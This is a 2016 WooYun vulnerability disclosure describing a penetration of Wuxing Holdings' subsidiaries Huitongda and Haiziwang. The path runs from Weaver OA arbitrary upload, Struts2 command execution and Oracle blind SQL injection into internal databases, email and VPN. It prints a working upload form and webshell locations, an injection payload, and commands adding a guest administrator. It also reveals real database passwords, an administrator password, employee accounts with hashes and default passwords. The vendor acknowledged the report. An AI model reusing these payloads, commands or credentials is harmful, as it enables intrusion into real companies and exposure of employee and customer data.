当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167734

漏洞标题:五星控股集团内网漫游旗下汇通达/孩子王(内部系统/OA/邮箱/VPN/数据库/服务器)

相关厂商:htd.cn

漏洞作者: DNS

提交时间:2016-01-06 15:22

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-07: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向核心白帽子及相关领域专家公开
2016-01-27: 细节向普通白帽子公开
2016-02-06: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

暂时涉及五星控股旗下的两个平台
农村O2O平台汇通达融资5亿元
孩子王,母婴平台

详细说明:

一:外网
外网的切入点暂时找到三个。
1.泛微的OA办公系统---任意上传(孩子王OA,汇通达OA,五星控股OA)
2.boss.htd.cn------post注入(延迟注入)
3.bi.htd.cn(202.102.90.252)-------st2漏洞
1.泛微的OA办公系统
案例: WooYun: 泛微某系统漏洞集合(不拿shell不是合格的白帽子)
利用代码

<form method='post' action='http://**.**.**.**/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" > 
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


直接任意上传
孩子王shell:http://oa.haiziwang.com/config.jsp

1.png


五星控股shell:http://oa.fsh.cn/config.jsp

1.png


汇通达shell:http://202.102.90.234/js/config.jsp
汇通达图下面说,这是内网入口
菜刀密码:DNS
2.http://202.102.90.252/loginOffportal.action存在ST2命令执行
网站绝对路径: D:\Program Files\tomcat6\webapps\datacvgbi\
运行结果:
win-c9lnn15nn2d\administrator
由于网站白名单限制,session限制导致shell无法连接,实际目录下应该存在shell,jspx也无法绕过。
3.post注入
http://boss.htd.cn/retrieve/retrievePwd.htm (POST)
act=forgetPassword&userid=88952634&mobile=88952634

Parameter: userid (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: act=forgetPassword&userid=88952634' AND 3697=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(110)||CHR(77)||CHR(71),5) AND 'cJPh'='cJPh&mobile=88952634
---
web application technology: JSP
back-end DBMS: Oracle
Columns like 'PASS' were found in the following databases:
Database: HTD_BOSS
Table: T_BASIC_USER
[1 column]
+----------+
| Column   |
+----------+
| PASSWORD |
+----------+
Database: HTD_BOSS
Table: V_T_HGJ_MEMBER
[1 column]
+----------+
| Column   |
+----------+
| PASSWORD |
+----------+


延迟注入太慢,跑了部分信息验证。
二.内网

1.汇通达
(1)OA
切入点在汇通达泛微OA。

1.png


获取到web数据库连接文件:

mask 区域 
*****ode*****
*****ot; encoding=&q*****
*****quot; version=&q*****
*****e="weaver.interfaces.*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****pe" value="*****
*****host" value=&qu*****
*****t;port" value=*****
*****name" value=&quo*****
*****uot;user" val*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****ce="weaver.interfaces*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****t;type" value=*****
*****st" value="*****
*****t;port" value=*****
*****t;dbname" valu*****
*****t;user" value=*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****="weaver.interfaces.*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****t;type" value=*****
*****st" value="*****
*****t;port" value=*****
*****t;dbname" valu*****
*****t;user" value=*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****="weaver.interfaces.*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****pe" value="*****
*****host" value=&qu*****
*****t;port" value=*****
*****dbname" value=&*****
*****uot;user" val*****
*****password" value*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****e="weaver.interfaces*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****pe" value="*****
*****st" value="*****
*****t;port" value=*****
*****name" value=&quo*****
*****uot;user" val*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****e="weaver.interfaces*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****pe" value="*****
*****st" value="*****
*****t;port" value=*****
*****name" value=&quo*****
*****uot;user" val*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****ace="weaver.interface*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****t;type" value=*****
*****host" value=&qu*****
*****t;port" value=*****
*****t;dbname" valu*****
*****t;user" value=*****
*****password" value*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****ce="weaver.interfaces*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****t;type" value=*****
*****st" value="*****
*****t;port" value=*****
*****t;dbname" valu*****
*****t;user" value=*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****e="weaver.interfaces*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****t;type" value=*****
*****st" value="*****
*****t;port" value=*****
*****t;dbname" valu*****
*****t;user" value=*****
*****ssword" value=&q*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****ce="weaver.interface*****
*****oke-fact*****
*****r.interfaces.datasourc*****
*****t;type" value=*****
*****st" value="*****
*****t;port" value=*****
*****t;dbname" valu*****
*****t;user" value=*****
*****word" value=&quot*****
*****t;minconn" val*****
*****t;maxconn" val*****
*****;/constr*****
*****voke-fac*****
*****ice-poi*****
*****dule*****
**********
*****--&*****
*****cod*****


连接进去数据库获取到汇通达所有员工账户信息

1.png


存在4000多

2.png


3.png


顺便说下,貌似80%的密码是初始密码1
由于是系统权限,直接可以加用户,打算抓取哈希,尝试了几个自己的神器都失败了。
激活了guest用户

net user guest debug.123! 
net user guest  /active:yes
net localgroup administrators guest  /add


通过代理软件,转发软件登陆3389,这里用的LCX转发,其他不行,估计是端口代理。
登陆上去,用mimikatz抓取到密码,看图

2.png


administrator oahtd1234!@#$
用这个登陆上去
,管理员挂着很多文件共享,数据库直接操作

1.png


2.png


这是菜刀链接到其他数据库操作

3.png


4.png


通过手机三个公司的泛微数据库文件,拿到几台数据库连接信息
mssql可以直接添加用户信息上去
开启xp_cmdshell

172.16.1.22-1.png


172.16.1.22-2.png


172.16.1.22-3.png


172.16.1.22-4.png


172.16.1.22-5.png


<img src="/u

192.168.1.82-1.png


192.168.1.82-2.png


192.168.1.82-3.png


192.168.1.82-4.png


192.168.1.82-5.png


192.168.1.82-6.png


这是172.16.1.22和192.168.1.82
抓取到的密码

172.16.1.22.png


192.168.1.82.png


可以直接3389
到这里我们已经接触到孩子王的数据库了
192.168.1.82就是孩子王的OA数据,孩子王OA前台是linux的。
(2)邮箱,VPN
通过分析OA系统用户密码规律,拿到几个邮箱
chenyan0326 A60ED9C9B102B8961785DBBBDDC6A53D 陈艳
tomarry7 842D8156FBB49A1F357A64D0E8A277F0 葛一枫
登陆看图

陈艳.png


2.png


公司构架

14年的邮件警告.png


安全一定要重视

109会员.png


邮件中涉及的敏感信息,客户信息

APP.png


初始密码.png


钓鱼邮件.png


各种钓鱼邮件

格兰仕商户账户.png


葛一枫桥.png


慧管家.png


慧管家1.png


活跃会员.png


江苏三创.png


洛阳汇丰.png


周媛媛。.png


邮箱的信息太多,通过分析,得出
OA初始密码:1
邮箱初始密码:000000
VPN初始密码:000000
尝试登陆VPN

VPN.png


用户为工号 密码000000
抱歉测试绑定了一台硬件。
VPN直接测试

1.png


(3)用友软件

1.png


192.168.1.48.png


2.孩子王
(1)OA

1.png


1.png


数据库连接文件
部分

nstruct class="weaver.interfaces.datasource.BaseDataSource">
                <set property="type" value="sqlserver2008" />
                <set property="host" value="172.16.1.15" />
                <set property="port" value="1433" />
                <set property="dbname" value="htdecology" />
                <set property="user" value="sa" />
                <set property="password" value="sqlser123654" />
                <set property="minconn" value="10" />
                <set property="maxconn" value="50" />


(2).邮箱

1.png


wifi密码.png


初始密码.png


工资.png


中欧商业在线培训需求调查.png


3.五星控股总部
就不演示
外网大同小异
内网已经突破进去了
数据库部分

truct class="weaver.interfaces.datasource.BaseDataSource">
                <set property="type" value="oracle" />
                <set property="host" value="172.16.1.23" />
                <set property="port" value="1521" />
                <set property="dbname" value="orcl" />
                <set property="user" value="cbm" />
                <set property="password" value="fsh123!@#" />
                <set property="minconn" value="5" />
                <set property="maxconn" value="10" />


暂时涉及两个公司一个总部
网段:193
10
192
172
四个网段都能通。
孩子王员工2W,汇通达4000,大部分密码是弱口令,总部没看

漏洞证明:

172.16.1.22-3.png

修复方案:

1.员工意识问题,弱口令,通用口令
2.管理员意识,下线后尽量关闭数据库,系统,禁止记住密码
3.线上文件加密传输,口令线下传输
4.关注国内安全事件,及时打好补丁

版权声明:转载请注明来源 DNS@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-07 12:06

厂商回复:

已经了解漏洞细节,正在整改。谢谢dns同学无偿渗透测试。感谢O(∩_∩)O~

最新状态:

暂无